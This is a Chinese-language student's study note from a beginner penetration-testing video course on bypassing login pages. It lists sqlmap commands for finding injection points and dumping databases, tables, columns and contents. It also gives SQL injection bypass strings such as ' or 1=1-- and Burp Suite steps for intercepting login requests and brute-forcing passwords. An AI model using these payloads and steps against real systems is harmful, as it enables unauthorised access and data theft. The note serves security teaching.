1. 程式人生 > 其它 >小白學滲透,超詳細教程筆記~《繞過密碼登入》原視訊是我們老師課上給看的B站up主“知黑科技”的系列教程:2019超詳細 滲透測試/黑客入門/漏洞學習

小白學滲透,超詳細教程筆記~《繞過密碼登入》原視訊是我們老師課上給看的B站up主“知黑科技”的系列教程:2019超詳細 滲透測試/黑客入門/漏洞學習

探測順序:(注入六連)

  1、Sqlmap -uhttp://www.xx.com?id=x(查詢是否存在注入點)

  2、--dbs(檢測站點包含哪些資料庫)

  3、--current -db(獲取當前的資料庫名)

  4、--tables -D”db_name”獲取指定資料庫中的表名(-D後 接指定的資料庫名稱)

  5、--columns -T”table_name” -D ”db_name”(獲取資料庫表中的欄位)

  6、--dump-C”columns_name”-T ”table_name”-D “db_name”(獲取欄位的資料內容)

一、在使用者欄輸入:’使用者名稱’or 1=1--。進入MySQL介面,可以看到password是多少

         

->從使用者框輸入:’使用者名稱’or 1=1 --

  (1) 常用的萬能密碼:’or’=’ or’ 、’or 1=1-- 、’or 1=1/*;

  (2) 登入SQL的語句:select *from admin where username =’使用者輸入的使用者名稱’ and password=’使用者輸入的密碼’;

  (3) SQL語句:select *from admin where username =’’or 1=1—and password=’使用者密碼’;

二、滲透

  1、用BURP(爆破軟體)探測,進行抓包;

              

  2、選擇對應測試物件;

  3、在BURP設定代理(為了抓包);

      點AdvanLed->Network->Setting中第四個->關閉;

  4、到BURP選單欄選options(第二行裡)

              

  5、檢視是否為登入IP地址的對應網站;

              

      如果原地址有誤則出現MySQL報錯

              

不報錯是:……php?id 1=1

  6、選Intercept截斷(登陸就能顯示到抓包);

              

              

  7、轉向網站輸入密碼:是正確密碼直接就進去了,是錯誤密碼就進行抓包、爆破。

              

  8、Intecept中的Raw是抓到的包的資料;

  9、把抓到的包進行傳送處理:可直接點選Intercept中的Action就能傳送到intruder模組了;

              

  10、選intruder->2->Sand to Intrillder

    點選Positions中的Attack type:選sniper對包資料內容進行包探測,對密碼xxx進行探測。

                

    對密碼xxx進行探測

        

    

  11、在探測完之後的頁面,

     

     

     

  12、proxy(是代理)下有Intercept;

      

    (1) 源地址有誤報錯;

       

    (2) 源地址無誤不報錯;

       

    (3) 不顯示內容也報錯;

       

  13、演示登陸注入(對登入提交的引數進行抓取、注入)

  • 登入後將抓取的資料包copy一下。
  • 右鍵選Open Terminal進入root@kali:(下面的)
  • 程式碼意思:(進入’Desktop’目錄)(新建一個’Untitled Decument1’類似文字文件的)
  • 將複製於內,Save到(桌面)target.txt ,關閉

     

    用sqlmap對剛抓取的內容進行探測,探測是否存在sql注入漏洞,(username –dbs是探測內容)

     

    探測出的cms注入的命令

     

    中間會問三次是否繼續探測(選Y),第四次是是否要測其他,(選N)

     

    Information-scheme是其他資料庫

     

  14、演示CMS注入並獲取對應資料

  • (-dbs是對登入網址進行探測)在探測時可以按回車進行加速操作(在加速操作時電腦自動選擇預設)

     

  • 探測cms中的資料庫中資料表

     

  • (-D cms -T articles)探測cms中的資料庫中的欄位

     

  可看到是三個欄位:

     

    (-D cms -T articles -C id,title,content --dump)探測當前欄位中的具體值

       

  可看到三個欄位的對應值:

     

    到此完成使用sqlmap來探測登入框及對應cms(ul)注入並且獲得對應資料。